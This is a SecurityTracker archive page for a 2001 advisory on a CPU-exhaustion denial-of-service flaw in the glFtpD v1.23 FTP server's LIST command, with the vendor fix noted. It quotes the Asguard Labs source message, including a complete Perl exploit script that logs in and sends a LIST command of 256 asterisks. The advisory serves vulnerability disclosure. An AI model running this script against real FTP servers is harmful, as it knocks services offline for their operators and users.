SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   glFtpD Vendors:   glftpd.org
glFtpD FTP Server LIST Command Flaw Lets Remote Users Consume All CPU Resources
SecurityTracker Alert ID:  1002217
SecurityTracker URL:  http://securitytracker.com/id/1002217
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 18 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): v1.23
Description:   Asguard Labs reported a vulnerability in glFtpd in the LIST command that allows a remote user with access to the server, including anonymous access, to cause the server to consume nearly all CPU resources.

It is reported that when a remote user sends a specially crafted LIST command to the server, the server will consume about 99% of CPU processing resources. The special LIST command is of the format "LIST *****[256 asteriks total]".

Demonstration exploit code is included in the Source Message.

Impact:   A remote user with valid access to the FTP server, including anonymous access, can cause the CPU to consume nearly all available processing resources.
Solution:   The vendor has released new binaries (v1.24), which are available at:

http://www.glftpd.org/glftpd.html

Vendor URL:  www.glftpd.org/ (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (FreeBSD), UNIX (NetBSD), UNIX (OpenBSD), UNIX (Solaris - SunOS)

Message History:   None.


 Source Message Contents

Subject:  [ASGUARD-LABS] glFTPD v1.23 DOS Attack


-00 ASGUARD LABS ADVISORY 00-


:Summary:

Release Date	: 	2001-08-17
Affected		:       	glFTPD for Linux v1.23 / glFTPD BSD v1.23 *bins
Not Affected     	:	glFTPD for Linux v1.24 / glFTPD BSD v1.24 *bins
Attack Type	:	Denial Of Service
Credits to	:	Jan Wagner


:Description:

The glFTPD v1.23 contains a very(x2) simple D.O.S. which affects the "LIST"
Command


:Detail:

If glFTPD v1.23 receives a special formed "LIST" command it consumes about
99% of CPU power
Tested on FreeBSD 4.3 and NetBSD 1.5.1 (linux emul)

:Exploit Code:

<gl123DOS.pl>
#!/usr/bin/perl

use IO::Socket;
use Socket;

print "-= ASGUARD LABS EXPLOIT - glFTPD v1.23i =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl gl123DOS.pl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "*" x 256;

$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect  to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can't send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n"  or die
"Error: can't send pass\n";

print $remote "LIST $err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can't send error code\n";

print "Attack done. press any key to exit\nnote: Attack done doesn't mean
Attack successful\n";
$bla= <STDIN>;
close $remote;


:Solution:

Just update to v1.24 released two days ago


:Comments:
This Bug was very easy to find ;-) ,
glFTPD is my first choice FTP Server <BUT> Why there is STILL no Source Code
available ?

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC